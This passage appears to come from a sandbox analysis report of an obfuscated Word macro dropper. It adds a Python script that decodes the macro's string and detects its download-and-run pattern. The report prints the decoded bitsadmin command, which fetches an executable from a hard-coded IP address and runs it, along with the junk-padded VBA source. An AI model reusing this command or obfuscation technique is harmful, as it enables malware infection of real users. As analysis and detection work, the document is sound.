Replace | Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","So4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit |
Array | |
Array | |
Array | |
CreateObject | CreateObject("vbscript.regexp") |
Date | |
Array | |
Array | |
Array | |
Pattern | |
Array | |
Array | |
Date | |
Array | |
Global | |
Replace | IRegExp2.Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit |
Strings | Decrypted Strings |
---|---|
"usher" | |
"l" | |
"""" | |
"m" | |
"vbscript.regexp" | |
"b1bc" | |
"g" | |
"""" | |
"-51274" | |
"-31815" | |
"""" |
Line | Instruction | Meta Information |
---|---|---|
2 | Function MJCTM(CWDMxZLy as String, FbIlx as String) | |
3 | Const MiPNInTB = "usher" | executed |
4 | Const VoTwTzi = 56413.774156729 | |
5 | ijrJGJ = 27499.72631798 | |
6 | Dim SMBLRBfVb | |
7 | SMBLRBfVb = Empty | |
8 | Dim UaeOs | |
9 | UaeOs = Array() | Array |
10 | Dim u6TmeUD | |
11 | u6TmeUD = 104 | |
12 | ur6AH = Null | |
13 | cxnTF = "l" | |
14 | MJCTM = Replace(CWDMxZLy, FbIlx, "") | Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","So4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit executed |
15 | Dim pLTyDvz | |
16 | pLTyDvz = Empty | |
17 | pcIlatmCk = Array(230, - 196, - 2001184018, 42, True) | Array |
18 | BnrkBExe = Array(10023, True, 53568, 247) | Array |
19 | Dim WDYsMRc | |
20 | WDYsMRc = 30721.11938915 | |
21 | Dim YzdUxwdTr as Integer | |
22 | YzdUxwdTr = 6299 | |
23 | Dim lByiA | |
24 | lByiA = Array() | Array |
25 | Const zLddbe = "m" | |
26 | Dim rIBoSu3Y | |
27 | rIBoSu3Y = Null | |
28 | Set SHswlL = CreateObject("vbscript.regexp") | CreateObject("vbscript.regexp") executed |
29 | QSdqj = Date | Date |
30 | Const NFLd2 = 209 | |
31 | Dim twrPREK as Variant | |
32 | twrPREK = Array() | Array |
33 | Dim u5gdI as Variant | |
34 | u5gdI = Array(False, "b1bc", 253, 17635, - 1034035452) | Array |
35 | Const AiUVN = 130 | |
36 | Dim xrO5u as Boolean | |
37 | xrO5u = False | |
38 | Dim DtSd2 as Currency | |
39 | DtSd2 = 24643 | |
40 | TxB7XFd = Array() | Array |
41 | SHswlL.Pattern = FbIlx | Pattern |
42 | Dim KWqu4PuM | |
43 | KWqu4PuM = Array(18941) | Array |
44 | Const PoTWMJbw = 4611 | |
45 | Const zvcqMHRt = 45690 | |
46 | Dim dBM7m | |
47 | dBM7m = Array() | Array |
48 | Dim Jhkf0ces | |
49 | Jhkf0ces = 18334 | |
50 | Px3LN = Empty | |
51 | Dim CP3XeR as Long | |
52 | Dim QLnSIFu | |
53 | QLnSIFu = "g" | |
54 | Dim FjRfK | |
55 | FjRfK = 37054 | |
56 | Dim lttYOFV as Byte | |
57 | lttYOFV = 103 | |
58 | Dim hwbE4nQC | |
59 | hwbE4nQC = 238 | |
60 | Dim HxZaHEuKH | |
61 | HxZaHEuKH = "" | |
62 | ZIGd3quHC = Date | Date |
63 | efuU1j3i = 19822 | |
64 | CP3XeR = True | |
65 | IsvteRd = True | |
66 | Dim xrm3j | |
67 | xrm3j = 0 | |
68 | Const wwBlWqvE = 32055 | |
69 | Dim YrDaO as Integer | |
70 | YrDaO = - 20549 | |
71 | Dim TQAPu | |
72 | TQAPu = Empty | |
73 | XFRbqp6x = False | |
74 | QvKu9pdc = Array(0, - 324123460, True, "-51274", 201, 77, 0) | Array |
75 | Const ZLaDNPOM0 = 0 | |
76 | SHswlL.Global = CP3XeR | Global |
77 | Dim BShA9 as Long | |
78 | BShA9 = - 652703950 | |
79 | Dim VLlsY | |
80 | VLlsY = 173 | |
81 | Dim JrF8V | |
82 | JrF8V = Null | |
83 | Const YCxJyqzq = - 23691 | |
84 | PlVOxYFG = "-31815" | |
85 | Const QjPYL = 224 | |
86 | MJCTM = SHswlL.Replace(CWDMxZLy, "") | IRegExp2.Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit executed |
87 | End Function |
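Everything MJCTM does apart from its two Replace calls is filler: the dozens of Dim, Const and Array() lines never feed into the result. The real logic is that the command line was obfuscated by inserting the junk token "So4T9" after every character, and the function strips that token twice, first with VBA's Replace() (the macro's line 14) and then with a vbscript.regexp object whose Pattern is the raw token (line 86). The first result is dead: line 86 overwrites MJCTM, so what reaches Shell at AutoOpen's line 124 is the regexp output. The following is an added example, not part of the Joe Sandbox report and not the sample's code. It reproduces both passes in Python, recovers the command, expands `%tmp%` the way cmd.exe would, and parses the result for the download-then-execute pattern. The obfuscated argument and the token are copied verbatim from AutoOpen's line 112; the `%tmp%` value is an assumption chosen so that the expansion reproduces the bitsadmin.exe command line recorded under System Behavior.

```python
import re

# Junk token and obfuscated argument copied verbatim from the macro's call
# MJCTM("cSo4T9m...", "So4T9") in NewMacros.AutoOpen (the report's line 112).
JUNK = "So4T9"
OBFUSCATED = (
    r"cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 "
    r"So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 "
    r"So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 "
    r"So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/"
    r"So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 "
    r"So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 "
    r"So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 "
    r"So4T9eSo4T9xSo4T9iSo4T9tSo4T9"
)

# Assumed environment: the sandbox user in the report is SOFWIL~1, so this
# value makes %tmp% expansion reproduce the recorded bitsadmin.exe command line.
SANDBOX_ENV = {"tmp": r"C:\Users\SOFWIL~1\AppData\Local\Temp"}


def vba_replace(text, find, repl=""):
    """VBA Replace(expr, find, replace) with its defaults: all occurrences, binary compare."""
    return text.replace(find, repl)


def regexp_replace(text, pattern, repl="", global_=True):
    """vbscript.regexp .Replace(). The macro assigns .Global from a Long holding
    True (-1), which VBA coerces back to True, so every match is replaced."""
    return re.sub(pattern, repl, text, count=0 if global_ else 1)


def deobfuscate(obf, junk):
    """Mirror MJCTM: Replace() first, then a regexp whose Pattern is the raw,
    unescaped token. The macro discards the first result, so the regexp result
    is returned; the two are still compared so that a token containing regex
    metacharacters (where the passes would diverge) is noticed."""
    plain = vba_replace(obf, junk)
    via_regexp = regexp_replace(obf, junk)
    if plain != via_regexp:
        raise ValueError("Replace() and regexp passes disagree; token is not a literal")
    return via_regexp


def expand_env(text, env):
    """cmd.exe-style %VAR% expansion, case-insensitive; unknown names are left as-is."""
    return re.sub(r"%([^%\s]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def cmd_c_stages(cmdline):
    """Split `cmd /C a & b & c` into its sequential stages; [] if not a cmd /C line."""
    m = re.match(r"^\s*cmd(?:\.exe)?\s+/[cC]\s+(.*)$", cmdline)
    if not m:
        return []
    return [s.strip() for s in m.group(1).split("&") if s.strip()]


def parse_bitsadmin_transfer(stage):
    """Recognise `bitsadmin /transfer <job> ... <url> <local path>`; None otherwise."""
    tokens = stage.split()
    if not tokens or tokens[0].lower() not in ("bitsadmin", "bitsadmin.exe"):
        return None
    lowered = [t.lower() for t in tokens]
    if "/transfer" not in lowered:
        return None
    ti = lowered.index("/transfer")
    job = tokens[ti + 1] if ti + 1 < len(tokens) else None
    for i, t in enumerate(tokens):
        if t.lower().startswith(("http://", "https://")) and i + 1 < len(tokens):
            return {"job": job, "url": t, "local_path": tokens[i + 1]}
    return None


def analyse_download_exec(cmdline, env):
    """Flag the download-then-execute chain: a bitsadmin transfer whose local
    path is itself run as a later stage of the same cmd /C line."""
    stages = cmd_c_stages(cmdline)
    for i, stage in enumerate(stages):
        hit = parse_bitsadmin_transfer(stage)
        if hit is None:
            continue
        local = expand_env(hit["local_path"], env)
        later = [expand_env(s, env).lower() for s in stages[i + 1:]]
        hit["local_path"] = local
        hit["executes_download"] = local.lower() in later
        return hit
    return None


if __name__ == "__main__":
    command = deobfuscate(OBFUSCATED, JUNK)
    print(command)
    print(analyse_download_exec(command, SANDBOX_ENV))
```

Running it prints the same command line the report shows being passed to Shell, followed by the parsed job name, URL and expanded local path with `executes_download` set, which is the combination (a transfer into `%tmp%` immediately followed by running that path) that distinguishes this macro from legitimate scripted BITS use.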
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |